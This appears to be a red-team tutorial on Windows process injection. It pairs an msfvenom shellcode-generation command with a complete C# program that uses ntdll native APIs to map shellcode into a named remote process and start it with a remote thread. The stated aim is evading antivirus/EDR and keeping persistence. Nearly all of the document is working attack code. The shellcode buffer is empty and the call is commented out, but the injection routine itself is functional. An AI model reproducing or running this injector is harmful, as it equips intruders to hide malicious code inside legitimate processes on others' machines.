Process injection is a technique used to inject code into a running process on a target machine. This can be done to evade AV/EDRs as well as maintaining persistence on a target machine.
This technique leverages the below low-level native APIs.
Copy msfvenom -a x64 --platform Windows -p windows/x64/exec CMD="C:\Windows\System32\calc.exe" -f csharp EXITFUNC=thread Now we should be able to reflectively. copy our shellcode into the remote process.
Copy using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace nt_PInject
{
internal class Program
{
[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING
{
public ushort Length;
public ushort MaximumLength;
public IntPtr Buffer;
}
[DllImport("ntdll.dll")]
public static extern void RtlInitUnicodeString(
ref UNICODE_STRING DestinationString,
[MarshalAs(UnmanagedType.LPWStr)] string SourceString);
static void InitializeObjectAttributes(
ref OBJECT_ATTRIBUTES objAttr,
ref UNICODE_STRING name,
int attr,
IntPtr root,
IntPtr secDesc)
{
objAttr.Length = Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES));
objAttr.RootDirectory = root;
objAttr.ObjectName = IntPtr.Zero;
objAttr.Attributes = (uint)attr;
objAttr.SecurityDescriptor = secDesc;
objAttr.SecurityQualityOfService = IntPtr.Zero;
}
[DllImport("ntdll.dll", SetLastError = true)]
static extern uint NtOpenProcess(
ref IntPtr ProcessHandle,
UInt32 AccessMask,
ref OBJECT_ATTRIBUTES ObjectAttributes,
ref CLIENT_ID ClientId);
[StructLayout(LayoutKind.Sequential, Pack = 0)]
struct OBJECT_ATTRIBUTES
{
public Int32 Length;
public IntPtr RootDirectory;
public IntPtr ObjectName;
public uint Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
[StructLayout(LayoutKind.Sequential)]
struct CLIENT_ID
{
public IntPtr UniqueProcess;
public IntPtr UniqueThread;
}
[DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)]
static extern UInt32 NtCreateSection(
ref IntPtr SectionHandle,
UInt32 DesiredAccess,
IntPtr ObjectAttributes,
ref UInt32 MaximumSize,
UInt32 SectionPageProtection,
UInt32 AllocationAttributes,
IntPtr FileHandle);
[DllImport("ntdll.dll", SetLastError = true)]
static extern uint NtMapViewOfSection(
IntPtr SectionHandle,
IntPtr ProcessHandle,
ref IntPtr BaseAddress,
UIntPtr ZeroBits,
UIntPtr CommitSize,
out ulong SectionOffset,
out uint ViewSize,
uint InheritDisposition,
uint AllocationType,
uint Win32Protect);
[DllImport("ntdll.dll", SetLastError = true)]
static extern IntPtr RtlCreateUserThread(
IntPtr processHandle,
IntPtr threadSecurity,
bool createSuspended,
Int32 stackZeroBits,
IntPtr stackReserved,
IntPtr stackCommit,
IntPtr startAddress,
IntPtr parameter,
ref IntPtr threadHandle,
IntPtr clientId);
[DllImport("ntdll.dll", SetLastError = true)]
static extern uint NtUnmapViewOfSection(
IntPtr hProc,
IntPtr baseAddr);
[DllImport("ntdll.dll", ExactSpelling = true, SetLastError = false)]
static extern int NtClose(
IntPtr hObject);
static void Main(string[] args)
{
//nt_PInject(args[0]);
return;
}
private static void nt_PInject(string processname)
{
// shellcode
byte[] buffer = new byte[296];
int bufLength = buffer.Length;
UInt32 ubufLength = (UInt32)bufLength;
// get handle on local and remote process
IntPtr localProcessHandle = Process.GetCurrentProcess().Handle;
string targetProcess = processname;
IntPtr remoteProcessHandle = IntPtr.Zero;
UNICODE_STRING name = new UNICODE_STRING();
RtlInitUnicodeString(ref name, null);
OBJECT_ATTRIBUTES objAttr = new OBJECT_ATTRIBUTES();
InitializeObjectAttributes(ref objAttr, ref name, 0, IntPtr.Zero, IntPtr.Zero);
objAttr.ObjectName = name.Buffer;
CLIENT_ID clientId = new CLIENT_ID
{
UniqueProcess = new IntPtr(Process.GetProcessesByName(targetProcess)[0].Id),
UniqueThread = IntPtr.Zero
};
NtOpenProcess(ref remoteProcessHandle, (uint)ProcessAccessFlags.All, ref objAttr, ref clientId);
// Creating new RWX memory section object
IntPtr sectionHandle = IntPtr.Zero;
NtCreateSection(ref sectionHandle, (uint)DesiredAccess.SECTION_MAP_READ | (uint)DesiredAccess.SECTION_MAP_WRITE | (uint)DesiredAccess.SECTION_MAP_EXECUTE, IntPtr.Zero, ref ubufLength, (uint)DesiredAccess.PAGE_EXECUTE_READWRITE, (uint)DesiredAccess.SEC_COMMIT, IntPtr.Zero);
// Mapping view of create section into the local process (R-W)
IntPtr localBaseAddress = IntPtr.Zero;
ulong localSectionOffset = 0;
NtMapViewOfSection(sectionHandle, localProcessHandle, ref localBaseAddress, UIntPtr.Zero, UIntPtr.Zero, out localSectionOffset, out ubufLength, 2, 0, (uint)DesiredAccess.PAGE_READ_WRITE);
// Mapping view of created section into the remote process (R-E)
IntPtr remoteBaseAddress = IntPtr.Zero;
ulong remoteSectionOffset = 0;
NtMapViewOfSection(sectionHandle, remoteProcessHandle, ref remoteBaseAddress, UIntPtr.Zero, UIntPtr.Zero, out remoteSectionOffset, out ubufLength, 2, 0, (uint)DesiredAccess.PAGE_READ_EXECUTE);
Marshal.Copy(buffer, 0, localBaseAddress, bufLength);
// Execute remote thread
IntPtr threadHandle = IntPtr.Zero;
RtlCreateUserThread(remoteProcessHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteBaseAddress, IntPtr.Zero, ref threadHandle, IntPtr.Zero);
// Cleaning up
NtUnmapViewOfSection(localProcessHandle, localBaseAddress);
NtClose(sectionHandle);
}
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF
}
public enum DesiredAccess : uint
{
SECTION_MAP_READ = 0x0004,
SECTION_MAP_WRITE = 0x0002,
SECTION_MAP_EXECUTE = 0x0008,
PAGE_READ_WRITE = 0x04,
PAGE_READ_EXECUTE = 0x20,
PAGE_EXECUTE_READWRITE = 0x40,
SEC_COMMIT = 0x8000000
}
}
}
